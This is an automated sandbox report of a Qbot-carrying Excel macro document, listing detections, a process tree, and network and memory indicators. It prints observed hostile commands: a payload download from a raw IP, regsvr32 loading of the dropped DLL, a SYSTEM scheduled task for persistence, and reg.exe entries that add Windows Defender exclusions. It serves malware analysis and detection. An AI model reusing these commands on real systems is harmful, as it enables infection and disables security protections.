Windows Analysis Report Compensation-1214892625-09272021.xls

Overview

General Information

Sample Name: Compensation-1214892625-09272021.xls
Analysis ID: 492195
MD5: cbf2562df8735334741b3de3ef9a0362
SHA1: db3bff7a0edc4dd7e3f4915dc36888f3be97c814
SHA256: 1b663952d7fa9e49cd53878bfddf2e2906788cbc7394b081e0fea52efd1fb6d1

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 344 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1832 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2176 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2908 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2540 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 2932 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2984 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 1840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2092 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 1476 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2532 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Compensation-1214892625-09272021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.regsvr32.exe.200000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
7.2.explorer.exe.80000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
6.2.regsvr32.exe.200000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
13.2.regsvr32.exe.420000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
7.2.explorer.exe.80000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 344, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1832
Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started, Author: Florian Roth, Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1832, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2176

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2980, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, ProcessId: 2908

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Compensation-1214892625-09272021.xls, ReversingLabs: Detection: 11%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.611132959.00000000026A1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,6_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,7_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,13_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: 44467.5523376157[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 28 Sep 2021 11:16:17 GMT
  Content-Type: application/octet-stream
  Content-Length: 387072
  Connection: keep-alive
  X-Powered-By: PHP/5.4.16
  Accept-Ranges: bytes
  Expires: 0
  Cache-Control: no-cache, no-store, must-revalidate
  Content-Disposition: attachment; filename="44467.5523376157.dat"
Source: global traffic, HTTP traffic detected:
  GET /44467.5523376157.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 190.14.37.178
  Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.611948922.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.609589480.0000000001ED0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.612616089.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.613822412.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.624790333.0000000000980000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.609965037.00000000021D0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0, Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0, Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0, Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Screenshot number: 4, Screenshot OCR: Enable Editing ) 23 24 25 2. Click to "Enable Content" to perform Microsoft Excel Decryption Core
Source: Screenshot number: 4, Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4, Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Drezd.red
PE file has nameless sections
Source: 44467.5523376157[1].dat.0.dr, Static PE information: section name:
Source: 44467.5523376157[1].dat.0.dr, Static PE information: section name:
Source: 44467.5523376157[1].dat.0.dr, Static PE information: section name:
Source: Drezd.red.0.dr, Static PE information: section name:
Source: Drezd.red.0.dr, Static PE information: section name:
Source: Drezd.red.0.dr, Static PE information: section name:
Source: Drezd.red.7.dr, Static PE information: section name:
Source: Drezd.red.7.dr, Static PE information: section name:
Source: Drezd.red.7.dr, Static PE information: section name:
Source: Drezd.red.14.dr, Static PE information: section name:
Source: Drezd.red.14.dr, Static PE information: section name:
Source: Drezd.red.14.dr, Static PE information: section name:
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10016EB0 6_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10012346 6_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10011758 6_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10014FC0 6_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00096EB0 7_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00092346 7_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00091758 7_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00094FC0 7_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00782C41 13_2_00782C41
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_0078242A 13_2_0078242A
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00781424 13_2_00781424
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00783726 13_2_00783726
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00783073 13_2_00783073
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_007832EB 13_2_007832EB
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00784162 13_2_00784162
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_007834DA 13_2_007834DA
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00781C5D 13_2_00781C5D
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00781827 13_2_00781827
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_0078B114 13_2_0078B114
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00784495 13_2_00784495
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00781D89 13_2_00781D89
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_00781000 13_2_00781000
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10016EB0 13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10012346 13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10011758 13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10014FC0 13_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00096EB0 14_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00092346 14_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00091758 14_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_00094FC0 14_2_00094FC0
Source: Compensation-1214892625-09272021.xls, OLE, VBA macro line: Sub auto_open()
Source: Compensation-1214892625-09272021.xls, OLE, VBA macro line: Sub auto_close()
Source: Compensation-1214892625-09272021.xls, OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: Compensation-1214892625-09272021.xls, OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,6_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,6_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,13_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,13_2_1000CB77
Source: Drezd.red.14.dr, Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr, Static PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
Source: Compensation-1214892625-09272021.xls, OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\System32\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........H.%.....N.......(...............Jump to behavior
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........H.......N.......(...............Jump to behavior
                        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2FE.tmp
                        Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,6_2_1000D523
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,13_2_100030B7
                        Source: Compensation-1214892625-09272021.xls OLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,6_2_1000ABA3
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{934600C4-65F4-44D0-AC1B-D6E4F146000D}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{68B24FFE-D380-4271-AF48-867FC64F6CB5}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{93993779-4C3C-4498-ABBF-6FA1BBE86A8C}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{93993779-4C3C-4498-ABBF-6FA1BBE86A8C}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{934600C4-65F4-44D0-AC1B-D6E4F146000D}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{68B24FFE-D380-4271-AF48-867FC64F6CB5}
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.611132959.00000000026A1000.00000004.00000001.sdmp
                        Source: 44467.5523376157[1].dat.0.dr Static PE information: section name: .rdatat
                        Source: 44467.5523376157[1].dat.0.dr Static PE information: section name:
                        Source: 44467.5523376157[1].dat.0.dr Static PE information: section name:
                        Source: 44467.5523376157[1].dat.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,6_2_1000DFAD

                        Persistence and Installation Behavior:

                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat

                        Boot Survival:

                        Drops PE files to the user root directory
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,13_2_100030B7

                        Hooking and other Techniques for Hiding and Protection:

                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2980 base: 1E102D value: E9 BA 4C EA FF
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2072 base: 1E102D value: E9 BA 4C EA FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1724 Thread sleep count: 42 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2836 Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 292 Thread sleep count: 46 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1916 Thread sleep count: 54 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1916 Thread sleep time: -92000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-13224
                        Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].dat
                        Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-10265
                        Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
